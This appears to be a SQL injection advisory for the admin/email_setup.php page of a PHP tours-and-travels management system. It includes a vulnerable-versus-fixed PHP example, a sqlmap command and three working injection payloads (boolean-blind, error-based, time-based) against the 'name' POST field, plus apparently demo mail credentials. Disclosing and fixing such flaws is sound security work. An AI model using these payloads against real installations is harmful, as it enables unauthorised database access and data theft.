SourceCodester Online Tours & Travels Management System email_setup.php sql injection

admin  Views:  2024-03-15

Url: admin/email_setup.php

Abstract:

Line 37 of email_setup.php invokes a SQL query built using unvalidated input. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.

Explanation:

SQL injection errors occur when:

  1. Data enters a program from an untrusted source.

  2. The data is used to dynamically construct a SQL query.

In this case the data is passed to prepare() in email_setup.php at line 37.
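The defect described above, as an added illustration that is not the project's own code: request values are interpolated into the SQL text before it reaches prepare(), so prepare() has nothing left to protect. The table and column names (email_setup, name, mail_driver_host, mail_port, mail_username, mail_password) are assumptions; only the POST parameter names come from the sqlmap output shown on this page.

```php
<?php
// Added example (not from the project): the anti-pattern behind the finding,
// beside its fix. Table and column names are ASSUMED for illustration.

// Vulnerable pattern: the values are already part of the SQL string when
// prepare() is called, so a name such as
//   Mayuri K.' AND 'uWJN'='uWJN
// is parsed as SQL and changes the meaning of the statement.
function updateEmailSetupVulnerable(mysqli $conn, array $post): bool
{
    $sql = "UPDATE email_setup SET name='{$post['name']}', "
         . "mail_driver_host='{$post['mail_driver_host']}', "
         . "mail_port='{$post['mail_port']}', "
         . "mail_username='{$post['mail_username']}', "
         . "mail_password='{$post['mail_password']}' WHERE id=1";
    $stmt = $conn->prepare($sql);   // tainted SQL text reaches prepare()
    return $stmt !== false && $stmt->execute();
}

// Hardened form: the SQL text is a constant with placeholders; the values
// travel separately through bind_param() and are never parsed as SQL.
function updateEmailSetupSafe(mysqli $conn, array $post): bool
{
    $sql = "UPDATE email_setup SET name=?, mail_driver_host=?, mail_port=?, "
         . "mail_username=?, mail_password=? WHERE id=1";
    $stmt = $conn->prepare($sql);
    if ($stmt === false) {
        return false;
    }
    // Validate shape where the application knows it: the port is an integer.
    $port = filter_var($post['mail_port'] ?? '', FILTER_VALIDATE_INT,
                       ['options' => ['min_range' => 1, 'max_range' => 65535]]);
    if ($port === false) {
        return false;
    }
    // Types: s = string, i = integer, in the order of the placeholders.
    $stmt->bind_param('ssiss',
        $post['name'], $post['mail_driver_host'], $port,
        $post['mail_username'], $post['mail_password']);
    return $stmt->execute();
}
```

With the hardened form, the same payload is stored literally as the value of the name column; the query text never changes.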

python sqlmap.py -r sql.txt

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: name=Mayuri K.' RLIKE (SELECT (CASE WHEN (6196=6196) THEN 0x4d6179757269204b2e ELSE 0x28 END)) AND 'uWJN'='uWJN&mail_driver_host=mail.gmail.com&mail_port=587&mail_username=mayuri.infospace@gmail.com&mail_password=programmers324&update=

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: name=Mayuri K.' AND EXTRACTVALUE(6478,CONCAT(0x5c,0x71706a7671,(SELECT (ELT(6478=6478,1))),0x717a6b6a71)) AND 'UqZk'='UqZk&mail_driver_host=mail.gmail.com&mail_port=587&mail_username=mayuri.infospace@gmail.com&mail_password=programmers324&update=

    Type: time-based blind
    Title: MySQL >= 5.0.12 RLIKE time-based blind
    Payload: name=Mayuri K.' RLIKE SLEEP(5) AND 'beie'='beie&mail_driver_host=mail.gmail.com&mail_port=587&mail_username=mayuri.infospace@gmail.com&mail_password=programmers324&update=
---

Download Code:
https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html